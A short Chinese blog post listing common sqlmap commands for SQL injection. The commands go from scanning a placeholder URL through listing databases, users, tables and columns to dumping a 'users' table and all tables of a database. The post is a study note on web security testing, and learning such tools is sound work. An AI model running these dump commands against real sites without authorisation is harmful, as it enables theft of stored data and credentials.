Sqlmap 快速使用说明

Published on 2017 - 09 - 13

最近在研究web安全,发现了大量好用的工具,可以节省很多时间,下面记录几条常用的sqlmap命令

开始扫描

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1"

显示数据库版本

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dbs

显示数据库用户列表

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --users

显示当前在用的数据库和用户

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --current-db --current-user

查看指定数据库的数据表

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --tables -D "acuart"

查看指定列表的字段

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --columns -T "users" -D "acuart"

计算列表中共有多少条数据

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --count -T "users" -D "acuart"

到处指定表中的数据

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dump -T "users" -D "acuart"

到处指定行的数据

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dump -T "users" -D "acuart" --start 2 --stop 3

导出数据库中所有表的数据

python sqlmap.py -u "http://Your_Domain_name/artists.php?artist=1" --dump-all -D "acuart"

关于继续进行下一步注入,我会在以后专门写个文章出来详细讲解~